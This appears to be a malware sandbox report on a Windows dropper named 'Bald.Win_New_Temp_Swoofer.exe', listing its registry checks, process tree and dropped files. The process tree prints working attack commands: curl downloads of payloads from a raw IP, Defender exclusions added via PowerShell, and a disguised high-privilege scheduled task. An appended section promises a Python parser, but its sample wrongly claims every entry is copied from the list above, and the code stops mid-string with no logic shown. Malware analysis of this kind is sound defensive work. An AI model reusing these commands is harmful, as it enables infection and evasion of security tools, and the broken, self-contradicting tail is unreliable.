Analysis
max time kernel: 91s
max time network: 99s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15-06-2024 21:07
Behavioral task: behavioral1
Sample: Bald.Win_New_Temp_Swoofer.exe
Resource: win7-20240508-en
General
Target: Bald.Win_New_Temp_Swoofer.exe
Size: 4.6MB
MD5: 76761b94d0187562e9acc8feb0d36111
SHA1: 40d118971e1c9e1e96264b23772ba0ec5e159a0c
SHA256: d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3
SHA512: d48731994aae2c6f7b86edf22f843913568ade13e482154b71798c7b37b62e617c0f6960b3c9ba8db5c70d173ff0ef864f9c2467d7db6fb5d617a88a301c1423
SSDEEP: 98304:L/hllE2G7C2b9cH1UWzfW4Npy2K176ylIqdF8J8mK98wbRNVGllXLTPhCPzH00pE:LxlCcH1BSBvrltsY9jDqXLVaL7u
Malware Config
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Bald.Win_New_Temp_Swoofer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
pid | process
3376 | powershell.exe
1408 | powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Bald.Win_New_Temp_Swoofer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Bald.Win_New_Temp_Swoofer.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | 1321192314-1141701036-55274516-1394016520.exe

Executes dropped EXE 1 IoCs
Processes:
pid | process
3440 | 1321192314-1141701036-55274516-1394016520.exe
Processes:
resource | yara_rule
behavioral2/memory/4260-0-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-4-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-2-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-3-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-6-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-5-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-7-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-26-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-97-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-252-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-370-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida
behavioral2/memory/4260-373-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp | themida

Checks whether UAC is enabled
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Bald.Win_New_Temp_Swoofer.exe
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Windows\System32\WindowsDSEProtectionSoft.dll | Bald.Win_New_Temp_Swoofer.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
4260 | Bald.Win_New_Temp_Swoofer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe

Modifies registry class 16 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519 | Bald.Win_New_Temp_Swoofer.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\DefaultIcon | Bald.Win_New_Temp_Swoofer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" | Bald.Win_New_Temp_Swoofer.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\URL Protocol | Bald.Win_New_Temp_Swoofer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\ = "URL:Run game 1249325487893905519 protocol" | Bald.Win_New_Temp_Swoofer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" | Bald.Win_New_Temp_Swoofer.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open\command | Bald.Win_New_Temp_Swoofer.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell | Bald.Win_New_Temp_Swoofer.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open | Bald.Win_New_Temp_Swoofer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | msedge.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
pid | process | events
4260 | Bald.Win_New_Temp_Swoofer.exe | 2
3900 | RuntimeBroker.exe | 4
3132 | msedge.exe | 2
5064 | msedge.exe | 2
3376 | powershell.exe | 3
3880 | msedge.exe | 1
1408 | powershell.exe | 3
3628 | identity_helper.exe | 2

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
pid | process | events
5064 | msedge.exe | 7

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid | process | tokens adjusted
4260 | Bald.Win_New_Temp_Swoofer.exe | SeDebugPrivilege
868 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this set of 21 tokens is recorded twice for PID 868)
3320 | WMIC.exe | the same 21 tokens as PID 868, recorded once

Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
pid | process | events
5064 | msedge.exe | 26

Suspicious use of SendNotifyMessage 24 IoCs
Processes:
pid | process | events
5064 | msedge.exe | 24

Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pid | process | target pid | target process | events
4260 | Bald.Win_New_Temp_Swoofer.exe | 3900 | RuntimeBroker.exe | 13
4260 | Bald.Win_New_Temp_Swoofer.exe | 4220 | cmd.exe | 2
4220 | cmd.exe | 432 | certutil.exe | 2
4220 | cmd.exe | 2124 | find.exe | 2
4220 | cmd.exe | 2400 | find.exe | 2
4260 | Bald.Win_New_Temp_Swoofer.exe | 4800 | cmd.exe | 2
4800 | cmd.exe | 5064 | msedge.exe | 2
5064 | msedge.exe | 3044 | msedge.exe | 2
5064 | msedge.exe | 1700 | msedge.exe | 37
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\System32\RuntimeBroker.exe
    cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
    - Suspicious behavior: EnumeratesProcesses
    PID: 3900
[1] C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4260
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      - Suspicious use of WriteProcessMemory
      PID: 4220
    [3] C:\Windows\system32\certutil.exe
        cmd: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5
        PID: 432
    [3] C:\Windows\system32\find.exe
        cmd: find /i /v "md5"
        PID: 2124
    [3] C:\Windows\system32\find.exe
        cmd: find /i /v "certutil"
        PID: 2400
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c start https://feds.lol/udman
      - Suspicious use of WriteProcessMemory
      PID: 4800
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/udman
        - Enumerates system info in registry
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
        PID: 5064
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1ae346f8,0x7ffb1ae34708,0x7ffb1ae34718
          PID: 3044
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
          PID: 1700
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
          - Suspicious behavior: EnumeratesProcesses
          PID: 3132
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
          PID: 4796
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
          PID: 1532
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
          PID: 4936
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
          PID: 1388
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5312 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses
          PID: 3880
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5456 /prefetch:8
          PID: 5076
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
          PID: 1928
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
          PID: 5008
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
          PID: 1036
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses
          PID: 3628
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
          PID: 2724
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
          PID: 2776
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe
      PID: 1268
    [3] C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe
        cmd: C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe
        - Checks computer location settings
        - Executes dropped EXE
        PID: 3440
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
          PID: 3652
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmd: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
            - Suspicious use of AdjustPrivilegeToken
            PID: 868
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe" /rl HIGHEST /f >nul
          PID: 4264
        [5] C:\Windows\system32\schtasks.exe
            cmd: schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe" /rl HIGHEST /f
            - Creates scheduled task(s)
            PID: 3900
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/hackeroopsecstubblucky/raw"
          PID: 5008
        [5] C:\Windows\system32\curl.exe
            cmd: curl -s "https://rentry.co/hackeroopsecstubblucky/raw"
            PID: 3968
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkitinstalllinklol/raw"
          PID: 4860
        [5] C:\Windows\system32\curl.exe
            cmd: curl -s "https://rentry.co/rootkitinstalllinklol/raw"
            PID: 1696
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkituninstalllinklol/raw"
          PID: 2516
        [5] C:\Windows\system32\curl.exe
            cmd: curl -s "https://rentry.co/rootkituninstalllinklol/raw"
            PID: 3612
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
          PID: 4980
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmd: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
            - Suspicious use of AdjustPrivilegeToken
            PID: 3320
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp'; Add-MpPreference -ExclusionPath $filePath"
          PID: 1664
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp'; Add-MpPreference -ExclusionPath $filePath"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 3376
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp --silent
          PID: 1896
        [5] C:\Windows\system32\curl.exe
            cmd: curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp --silent
            PID: 2128
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp'; Add-MpPreference -ExclusionPath $filePath"
          PID: 2400
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp'; Add-MpPreference -ExclusionPath $filePath"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 1408
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp --silent
          PID: 4888
        [5] C:\Windows\system32\curl.exe
            cmd: curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp --silent
            PID: 5088
[1] C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 3376
[1] C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 4428
Network
MITRE ATT&CK Enterprise v15
Downloads
SHA5122c09a70bac3d5691f480917b35d36734917e5cc38b5c403eef067a09bddd4da8780847b24401879aa7098ab3e2d104183ca6166c1e193c8781864fbe6ada7472
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52979eabc783eaca50de7be23dd4eafcf
SHA1d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA51292bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba
-
C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmpFilesize
146B
MD58eec510e57f5f732fd2cce73df7b73ef
SHA13c0af39ecb3753c5fee3b53d063c7286019eac3b
SHA25655f7d9e99b8e2d4e0e193b2f0275501e6d9c1ebd29cadbea6a0da48a8587e3e0
SHA51273bbf698482132b5fd60a0b58926fddec9055f8095a53bc52714e211e9340c3419736ceafd6b279667810114d306bfccdcfcddf51c0b67fe9e3c73c54583e574
-
C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exeFilesize
51KB
MD5b7802d686f7c65282cd7b6a45142a98b
SHA1feb041fef423f8404d2ef046b21c506e60cac3b7
SHA256e19f99f3434059e5fc38f3dcf1c89387309af2966b90b0a24f0fa22bdc393dcd
SHA512463d1ce3edec83623df093f7b4a13e430cad4ecc3aaeff20d660d4a7c30929583aacba51d06706623e37b3051f8447ab644bcd45ee89c0fbb591fd1729dcc6ce
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s5u34da.nhl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\pipe\LOCAL\crashpad_5064_UZPLZCCYSPGNUCNKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
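The dropped-files list above is what a responder actually pivots on, and most of it is host noise. The following is an added example written for this page (not sandbox output and not part of the report) that parses the flattened form in which such an export is extracted (the field label fused onto the end of the previous value: "<path>Filesize", then the size, then "MD5<hash>", "SHA1<hash>" and so on), discards entries whose digests are those of zero bytes (the Crashpad named pipe: d41d8cd98f00b204e9800998ecf8427e is MD5 of empty input), separates files that PowerShell and Edge write on any Windows 10 host from the drop worth hunting, and checks that every digest has the length its algorithm demands. The four sample entries are copied from the list above; the noise path patterns, the record layout and the input shape are assumptions of this example.

```python
import hashlib
import re

# Constructed sample: four entries copied from the dropped-files list, in the
# flattened form the export was extracted in (label fused onto the previous
# value). The input shape is an assumption of this example, not a documented format.
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD52739ce09e07758f34ade0598ee27ce1d
SHA1a336309adff3c15824be99bc059978dcc9cd370c
SHA25647504e43997db55ac957a99327fc617b970411f1372fc2b755464d9ad99a00bd
SHA51245b40f5b7de58f81a998d001c256a50ce15dd62d42ba332a78745bffed103ac29aa321abba60dd0147b14df73fb94f79e1b0ad66a069a0dbe77191df9246d587
-
C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exeFilesize
51KB
MD5b7802d686f7c65282cd7b6a45142a98b
SHA1feb041fef423f8404d2ef046b21c506e60cac3b7
SHA256e19f99f3434059e5fc38f3dcf1c89387309af2966b90b0a24f0fa22bdc393dcd
SHA512463d1ce3edec83623df093f7b4a13e430cad4ecc3aaeff20d660d4a7c30929583aacba51d06706623e37b3051f8447ab644bcd45ee89c0fbb591fd1729dcc6ce
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s5u34da.nhl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\pipe\LOCAL\crashpad_5064_UZPLZCCYSPGNUCNKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
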